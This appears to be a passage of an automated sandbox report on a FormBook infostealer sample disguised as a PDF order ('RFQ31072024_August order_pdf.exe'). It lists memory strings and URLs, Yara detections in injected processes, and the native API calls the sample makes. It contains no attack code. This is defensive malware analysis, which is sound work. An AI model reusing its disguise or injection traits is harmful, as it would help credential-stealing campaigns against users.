Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3845273913.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000002.3845273913.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000008.00000002.3851391138.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.000000000562F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://bsky.app/profile/kucinglucu.online
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000008.00000000.1442441484.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848337193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 00000008.00000002.3851391138.0000000010A2B000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827151004.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.00000000051DB000.00000004.10000000.00040000.00000000.sdmp, RFQ31072024_August order_pdf.exe, EqtGqZpPskFq.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RFQ31072024_August order_pdf.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 8124, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 7408, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: RFQ31072024_August order_pdf.exe
Source: initial sample	Static PE information: Filename: RFQ31072024_August order_pdf.exe

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A350 NtCreateFile,	7_2_0041A350
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A400 NtReadFile,	7_2_0041A400
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A480 NtClose,	7_2_0041A480
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A530 NtAllocateVirtualMemory,	7_2_0041A530
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A34A NtCreateFile,	7_2_0041A34A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A3FA NtReadFile,	7_2_0041A3FA
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A47B NtClose,	7_2_0041A47B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A52A NtAllocateVirtualMemory,	7_2_0041A52A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612B60 NtClose,LdrInitializeThunk,	7_2_01612B60
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_01612BF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612AD0 NtReadFile,LdrInitializeThunk,	7_2_01612AD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_01612D30
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_01612D10
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_01612DF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612DD0 NtDelayExecution,LdrInitializeThunk,	7_2_01612DD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_01612C70
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_01612CA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612F30 NtCreateSection,LdrInitializeThunk,	7_2_01612F30
